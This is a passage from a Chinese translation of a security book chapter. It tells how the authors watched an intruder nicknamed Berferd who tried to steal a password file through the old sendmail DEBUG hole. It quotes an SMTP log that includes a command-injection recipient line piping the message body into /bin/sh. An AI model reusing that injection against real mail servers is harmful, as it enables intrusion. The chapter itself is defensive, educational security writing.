第10章 与黑客Berferd周旋.pdfVIP

下载 第10章 与黑客Berferd周旋 10.1 引言 遭遇黑客并非愉快的经历。知道的主机不可探测的部分受到侵犯，或者系统增加了几个 新的义务系统管理员，也不是件有趣的事情。 但是在我们这里，一个坚实而可靠的网关可以为驾驭黑客提供安全的后盾。 William R. C h e s w i c k 、Steven M. Bellovin 、Diana DAngelo 和Paul Glick 与一名志愿者(黑客)玩了一翻， C h e s w i c k讲述了这个故事。 本章的大部分内容取自 [ C h e s w i c k , 1 9 9 2 ]。我们只是插入了一些体会。后见之明也 是一件极好的事情。 正如所有的黑客故事一样，我们从查看日志开始 . . . . . . 10.2 不友好的行为 我第一次发现我们的志愿者，是在他通过一条旧的、有争议的路由发起一个典型请求的 时候。他想要我们的一份口令文件副本，大概是为了普通的目录攻击。但他试图通过那个过 时的sendmail 的D E B U G漏洞来获取它 (请不要和新的 s e n d m a i l 的漏洞混淆起来，那可是一个 军队) 。 下面的材料取自 1 9 9 1年1月1 5 日的日志，显示了十分不友好的行动： 19:43:10 smtpd: 220 SMTP 19:43:14 smtpd: debug 19:43:14 smtpd: DEBUG attempt 19:43:14 smtpd: 200 OK 19:43:25 smtpd: mail from:/dev/null 19:43:25 smtpd: 503 Expecting HELO 19:43:34 smtpd: helo 19:43:34 smtpd: HELO from 19:43:34 smtpd: 250 19:43:42 smtpd: mail from:/dev/null 19:43:42 smtpd: 250 OK 19:43:59 smtpd: rcpt to:/dev/^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H 19:43:59 smtpd: 501 syntax error in recipient name 19:44:44 smtpd: rcpt to:|sed -e 1,/^$/d | /bin/sh ; exit 0 19:44:44 smtpd: shell characters:|sed -e 1,/^$/d | /bin/sh ; exit 0 19:44:45 smtpd: 250 OK 19:44:48 smtpd: data 19:44:48 smtpd: 354 Start mail input; end with CRLF.CRLF 130使用第三部分 回 顾 下载 19:45:04 smtpd: 250 OK 19:45:04 smtpd: /dev/null sent 48 bytes to upas.security 19:45:08 smtpd: quit 19:45:08 smtpd: 221 Terminating 19:45:08 smtpd: finished. 这是我们的一次S M T P会话日志，S M T P会话通常在两个邮件发送器之间进行。在这个案例 里，有一个人在另一端 (有意或无意)键入一些命令到我们的邮件后台守护程序。他试图使用的 第一个命令是D E B U G 。当他得到“250 OK ”响应时一定很吃惊(实现这次陷阱需要我们邮件发 送器中的几行代码，参见第7章。这些代码已纳入UNIX SVR4 的邮件发送器中) 。关键的一行是 在1 9 : 4 4 : 4 4时输入的命令rcpt to ：。该命令行的尖角括号中的文本通常是邮件接收者的地址。此 处包含了一个命令行。当处于调试模式时